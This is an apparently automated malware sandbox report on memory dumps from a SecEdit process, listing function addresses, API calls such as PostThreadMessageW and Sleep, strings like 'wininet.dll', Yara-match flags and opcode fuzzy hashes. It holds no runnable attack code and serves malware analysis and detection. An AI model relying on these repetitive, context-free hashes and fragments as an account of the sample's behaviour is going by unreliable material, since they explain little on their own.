                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: c739b042b350850b4818b4fed63b671b14cb4d835119700fb9fc0e63b6625a80
                                                            • Instruction ID: a80387c5a22e31ff354a788b513f612407f17900879e40aae3f6370feacc8b62
                                                            • Opcode Fuzzy Hash: c739b042b350850b4818b4fed63b671b14cb4d835119700fb9fc0e63b6625a80
                                                            • Instruction Fuzzy Hash: 7490023520241C02E180B158840564A044587D1301F96C016A0025654DCF158B5977A1
                                                            Function 03012AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: ff73fc0b7103714728f8a4dd9fe519b06355064131b4ef16eee62cc8548d60a2
                                                            • Instruction ID: dc231f726ee10e785d56c8c7d0c6a2a9aa2e1f738f89c0a952809d1d140243a6
                                                            • Opcode Fuzzy Hash: ff73fc0b7103714728f8a4dd9fe519b06355064131b4ef16eee62cc8548d60a2
                                                            • Instruction Fuzzy Hash: 90900229212414031105F5584705507048687D5351356C022F1015550CDB2189615221
                                                            Function 03012AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 4f0a65c068645740428e9fe786b3d84de79e4e0234d609b7cbeb5f57e3d876d1
                                                            • Instruction ID: 3a5360fd78e5c988a99093596c9a929a5fda2c7faa00fe88b204e0de453f3f53
                                                            • Opcode Fuzzy Hash: 4f0a65c068645740428e9fe786b3d84de79e4e0234d609b7cbeb5f57e3d876d1
                                                            • Instruction Fuzzy Hash: B2900229222414021145F558460550B088597D6351396C016F1416590CCB2189655321
                                                            Function 030139B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 75121482c20d8ab84c733974a624de975ab73ad4a4ac4a17d4be17fe338e17b1
                                                            • Instruction ID: 854abfacaa8ec0928ebdb7dcc3d8f7c8594d3fd254db2fa74a02b552ccd3a3b2
                                                            • Opcode Fuzzy Hash: 75121482c20d8ab84c733974a624de975ab73ad4a4ac4a17d4be17fe338e17b1
                                                            • Instruction Fuzzy Hash: 0490022524646502E150B15C84056164445A7E0201F56C022A0814594D8A5589556321
                                                            Function 03012F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 508e5a5fe13a9de450f71dc2037fd1f4b940c823c64f3a5957d50d7371014cd1
                                                            • Instruction ID: dab8fc51ed31a70724aeda445dbf50ef48bcb2d0358edc3502ad7b60f3c0cca8
                                                            • Opcode Fuzzy Hash: 508e5a5fe13a9de450f71dc2037fd1f4b940c823c64f3a5957d50d7371014cd1
                                                            • Instruction Fuzzy Hash: 2790026534241842E100B1588415B060445C7E1301F56C016E1064554D8B19CD526226
                                                            Function 03012FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 405d403db8a0b23523788629cc2b106e34585b6442f2f059fb7d1c6cfced81af
                                                            • Instruction ID: 132bdb53448fd6282225f3140e0b9d74444259cca1332277eeea32c59e48f08d
                                                            • Opcode Fuzzy Hash: 405d403db8a0b23523788629cc2b106e34585b6442f2f059fb7d1c6cfced81af
                                                            • Instruction Fuzzy Hash: 8E900225602414425140B168C8459064445ABE1211756C122A0998550D8A5989655765
                                                            Function 03012FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 246e991b37ab1d33b5e3755f1b820eaac07ee49c205093730adc3db1caa14eb1
                                                            • Instruction ID: 18fa2e698eb62532dc09582734dc02e6500fc8c09cf562ab25ff4f71b300f992
                                                            • Opcode Fuzzy Hash: 246e991b37ab1d33b5e3755f1b820eaac07ee49c205093730adc3db1caa14eb1
                                                            • Instruction Fuzzy Hash: 06900225212C1442E200B5688C15B07044587D0303F56C116A0154554CCE1589615621
                                                            Function 03012E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 51a2a7c124e8bce6f77c5c8ef532e0d978c33ed0e41dde7482c291e5eb873996
                                                            • Instruction ID: f447367314a800352b93e9563d543e38989dfaa85ac07f4eecb29cd1ca890918
                                                            • Opcode Fuzzy Hash: 51a2a7c124e8bce6f77c5c8ef532e0d978c33ed0e41dde7482c291e5eb873996
                                                            • Instruction Fuzzy Hash: 2C90022560241902E101B1588405616044A87D0241F96C023A1024555ECF258A92A231
                                                            Function 03012EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 912c958170ad805e7f004ff6b1405f6d026a99a84c41be5dc291409c998a4c6f
                                                            • Instruction ID: 255623412b6a2e369694e30bd6b2b6d6eb2a657d667d6533edf6a01aa07ce16d
                                                            • Opcode Fuzzy Hash: 912c958170ad805e7f004ff6b1405f6d026a99a84c41be5dc291409c998a4c6f
                                                            • Instruction Fuzzy Hash: 1B90026520281803E140B5588805607044587D0302F56C012A2064555E8F298D516235
                                                            Function 03012D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: e0772f79979692c81b16b384c1ea31a7a2968287f3ba9b5075511086501e4338
                                                            • Instruction ID: 78b03b3d99638f78bf966f88ba24e7c68576b9f882fd946e12be861ca69b045b
                                                            • Opcode Fuzzy Hash: e0772f79979692c81b16b384c1ea31a7a2968287f3ba9b5075511086501e4338
                                                            • Instruction Fuzzy Hash: DE90022D21341402E180B158940960A044587D1202F96D416A0015558CCE1589695321
                                                            Function 03012D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: adee50fd0c3f893fe2f9f88c73bb83ddd6b0f9b8d103da0cfd78ea6923002059
                                                            • Instruction ID: db305bb27ae5a4cda222143c829d352b00017a5db732c057b3a134b4f017ea5a
                                                            • Opcode Fuzzy Hash: adee50fd0c3f893fe2f9f88c73bb83ddd6b0f9b8d103da0cfd78ea6923002059
                                                            • Instruction Fuzzy Hash: 7F90022530241403E140B15894196064445D7E1301F56D012E0414554CDE1589565322
                                                            Function 03012DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 5dcbaa38f5f1463dfa3b54daec625f6e6e423796cce74fa34277eaf403d561ee
                                                            • Instruction ID: 025cc31f9b0631009fbedab67629836fbe3bbaeae3616b97ea74be3d00a14750
                                                            • Opcode Fuzzy Hash: 5dcbaa38f5f1463dfa3b54daec625f6e6e423796cce74fa34277eaf403d561ee
                                                            • Instruction Fuzzy Hash: 73900225243455526545F1588405507444697E0241796C013A1414950C8A269956D721
                                                            Function 03012DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 3c0307f5ce268a2549d2b6a95ee2605f417c0901469135197412a7a103e90083
                                                            • Instruction ID: 638605b6552b5e9a396d3b263958306c283226d2ac67d6602524cfd48f469978
                                                            • Opcode Fuzzy Hash: 3c0307f5ce268a2549d2b6a95ee2605f417c0901469135197412a7a103e90083
                                                            • Instruction Fuzzy Hash: 6E90023520241813E111B1588505707044987D0241F96C413A0424558D9B568A52A221
                                                            Function 03012C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: bedf74ae3188f7c395b6f544e1b526c5a38f851b140462c84db2f2124571e330
                                                            • Instruction ID: ab55d4dc40bc5c3c6bfbfb6aa3217ee2ac5690cc64c435166f8a72c830b5159a
                                                            • Opcode Fuzzy Hash: bedf74ae3188f7c395b6f544e1b526c5a38f851b140462c84db2f2124571e330
                                                            • Instruction Fuzzy Hash: 3890023520241C42E100B1588405B46044587E0301F56C017A0124654D8B15C9517621
                                                            Function 03012C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: e91b0beedd2c8512e0a0470f4c53408dce56f995b395de2ce1efdebd0b7736f6
                                                            • Instruction ID: 9e40f6d2cc5050f519eb28bb8a39757898492fcd42abb5bfef4b475fd2c42232
                                                            • Opcode Fuzzy Hash: e91b0beedd2c8512e0a0470f4c53408dce56f995b395de2ce1efdebd0b7736f6
                                                            • Instruction Fuzzy Hash: 4490023520249C02E110B158C40574A044587D0301F5AC412A4424658D8B9589917221
                                                            Function 03012CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: a27aa351c66656825e89f637e849795009ad6395588b603080d12048dee0549a
                                                            • Instruction ID: 1c2b28699c5cd5925a4ae24fe22c7f44f735a8be56c47fcc1f6f7638a75bfc3d
                                                            • Opcode Fuzzy Hash: a27aa351c66656825e89f637e849795009ad6395588b603080d12048dee0549a
                                                            • Instruction Fuzzy Hash: 7F90023520241802E100B5989409646044587E0301F56D012A5024555ECB6589916231
                                                            Function 00580878 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 485 580878-58087d 486 58080a-580831 485->486 487 58087f-5808ea call 599dd0 call 59a7e0 call 584270 call 571410 call 5910e0 485->487 500 58090a-580910 487->500 501 5808ec-5808fb PostThreadMessageW 487->501 501->500 502 5808fd-580907 501->502 502->500
                                                            APIs
                                                            • PostThreadMessageW.USER32(1150d71,00000111,00000000,00000000), ref: 005808F7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 1150d71$1150d71
                                                            • API String ID: 1836367815-1654785705
                                                            • Opcode ID: 1c99c398469fa4c0f7f11dfc4b2ad13454d6a9531513dd87cd9b78f22418278c
                                                            • Instruction ID: 50bd0e33ae7c0b54c104eccfb4d7c601166e02eae5e6a550c6bcf5b94a969b1e
                                                            • Opcode Fuzzy Hash: 1c99c398469fa4c0f7f11dfc4b2ad13454d6a9531513dd87cd9b78f22418278c
                                                            • Instruction Fuzzy Hash: 3A115CB6D0024D7AEB00A6A49C86DFF7F7CEF81790F008165FD0477141E6698E4A87E1
                                                            Function 00580861 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 503 580861-58086a 504 58086c-580877 503->504 505 580890-5808ea call 599dd0 call 59a7e0 call 584270 call 571410 call 5910e0 503->505 504->505 517 58090a-580910 505->517 518 5808ec-5808fb PostThreadMessageW 505->518 518->517 519 5808fd-580907 518->519 519->517
                                                            APIs
                                                            • PostThreadMessageW.USER32(1150d71,00000111,00000000,00000000), ref: 005808F7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 1150d71$1150d71
                                                            • API String ID: 1836367815-1654785705
                                                            • Opcode ID: 3ebb21670b63177cd7f21cf8dda2c8b91a91a72cb3fa08c8d8e0f3f8c7859c12
                                                            • Instruction ID: f3ed694b368ade194dcc1186996f035b0e521b3573ee332e0ab4a02bcf34a077
                                                            • Opcode Fuzzy Hash: 3ebb21670b63177cd7f21cf8dda2c8b91a91a72cb3fa08c8d8e0f3f8c7859c12
                                                            • Instruction Fuzzy Hash: 4001A9769401597AEB01A6A49C82DEFBF7CEF81355F00C055F908B7141D5254D0A8BE1
                                                            Function 00580880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 520 580880-5808ea call 599dd0 call 59a7e0 call 584270 call 571410 call 5910e0 533 58090a-580910 520->533 534 5808ec-5808fb PostThreadMessageW 520->534 534->533 535 5808fd-580907 534->535 535->533
                                                            APIs
                                                            • PostThreadMessageW.USER32(1150d71,00000111,00000000,00000000), ref: 005808F7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 1150d71$1150d71
                                                            • API String ID: 1836367815-1654785705
                                                            • Opcode ID: 9400ff0778bdac7587bd17546feb54b1e4b89ad3763cd8b5c25fe36bc285e749
                                                            • Instruction ID: 5c8d56f75c5e7974e954f4060278ea56d0e47fb2f66ad23e575ff8ed0e95ac84
                                                            • Opcode Fuzzy Hash: 9400ff0778bdac7587bd17546feb54b1e4b89ad3763cd8b5c25fe36bc285e749
                                                            • Instruction Fuzzy Hash: 5401C4B5D4024DBAEB00AAE48C86DEFBF7CEF80794F008064F90477141D6685E0A87F2
                                                            Function 00580850 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 536 580850-580856 537 580858-58085d 536->537 538 5808ab-5808ea call 584270 call 571410 call 5910e0 536->538 537->538 545 58090a-580910 538->545 546 5808ec-5808fb PostThreadMessageW 538->546 546->545 547 5808fd-580907 546->547 547->545
                                                            APIs
                                                            • PostThreadMessageW.USER32(1150d71,00000111,00000000,00000000), ref: 005808F7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 1150d71$1150d71
                                                            • API String ID: 1836367815-1654785705
                                                            • Opcode ID: cf0db8bf20dcf734019afe6cc77d4a64fec740e73809653b29b04ee1637f805e
                                                            • Instruction ID: ef7389388dca0806f469b1d00f789e43d94ee0078fd270cde97bf26b1fcdea54
                                                            • Opcode Fuzzy Hash: cf0db8bf20dcf734019afe6cc77d4a64fec740e73809653b29b04ee1637f805e
                                                            • Instruction Fuzzy Hash: 02F028B6A0125D76AB0166E0ACC5CFFAB6CEE807A4F10C175FD08B7141D6294E0657A1
                                                            Function 005929A0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000007D0), ref: 00592A6B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: net.dll$wininet.dll
                                                            • API String ID: 3472027048-1269752229
                                                            • Opcode ID: 3b2f4c1649cd4c7cedab1f0f7efbf9e7f19a1904b99aeaa6329987890cedaf4c
                                                            • Instruction ID: 0ccdd627bcc96074f49859b9a830f242627428603907ac3b48158786204a381b
                                                            • Opcode Fuzzy Hash: 3b2f4c1649cd4c7cedab1f0f7efbf9e7f19a1904b99aeaa6329987890cedaf4c
                                                            • Instruction Fuzzy Hash: A9318EB5600706BBCB24DF65C885FE7BBB8BB88704F00852CFA5D5B245D774AA44CBA0
                                                            Function 0058EA30 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: @J7<
                                                            • API String ID: 3442037557-2016760708
                                                            • Opcode ID: 7a8748ca7a07d40615020e45670b5181cc4ce1158c6b7b51f14c46954ea96ff3
                                                            • Instruction ID: 2a755299bd94c5454b29fc0f092ca2065854f010682582487b18f717ee5563be
                                                            • Opcode Fuzzy Hash: 7a8748ca7a07d40615020e45670b5181cc4ce1158c6b7b51f14c46954ea96ff3
                                                            • Instruction Fuzzy Hash: F2313275A0020AAFDB00DFD8D8819EFB7B9FF88304B108559E906E7214D775EE05CBA0
                                                            Function 0058EA2F Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: @J7<
                                                            • API String ID: 3442037557-2016760708
                                                            • Opcode ID: 5b2c85f859fd3541cda50df0646067ed3c31d3ea093f33fac28a1776c8a40ccf
                                                            • Instruction ID: a0befcc3da6d418c9a39d4af63bb5f8ee5cdce0b00bb6de549b2c0f442e59618
